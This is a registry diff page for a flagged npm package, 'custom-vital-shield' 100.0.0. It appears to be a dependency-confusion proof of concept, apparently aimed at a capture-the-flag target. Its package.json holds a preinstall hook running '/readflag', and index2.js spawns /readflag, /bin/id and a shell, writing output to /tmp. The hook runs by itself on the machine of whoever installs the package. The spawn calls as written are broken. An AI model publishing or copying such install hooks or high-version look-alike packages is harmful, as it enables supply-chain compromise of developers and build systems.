custom-vital-shield 100.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of custom-vital-shield might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index2.js +11 -0
  2. package/index2.js_old +3 -0
  3. package/package.json +24 -0
package/index2.js ADDED
@@ -0,0 +1,11 @@
1
+
2
+ 'use strict';
3
+
4
+ module.exports = function(generateNonce) {
5
+
6
+ var ps = cp.spawn("/readflag", " > /tmp/222.json");
7
+ var ps = cp.spawn("/bin/id", " > /tmp/333.json");
8
+ var ps = cp.spawn("/bin/sh", " -c ls > /tmp/444.json");
9
+
10
+ return false;
11
+ };
package/index2.js_old ADDED
@@ -0,0 +1,3 @@
1
+ module.exports.hacked = function () {
2
+ return "hacked"
3
+ }
package/package.json ADDED
@@ -0,0 +1,24 @@
1
+ {
2
+ "name": "custom-vital-shield",
3
+ "version": "100.0.0",
4
+ "description": "test",
5
+ "main": "index2.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "/readflag > /tmp/1.json"
9
+ },
10
+ "author": "0xsapra",
11
+ "license": "ISC",
12
+ "repository": {
13
+ "type": "git",
14
+ "url": "git+https://github.com/0xsapra/dependency-confusion-expoit.git"
15
+ },
16
+ "keywords": [
17
+ "poc",
18
+ "test"
19
+ ],
20
+ "bugs": {
21
+ "url": "https://github.com/0xsapra/dependency-confusion-expoit/issues"
22
+ },
23
+ "homepage": "https://github.com/0xsapra/dependency-confusion-expoit#readme"
24
+ }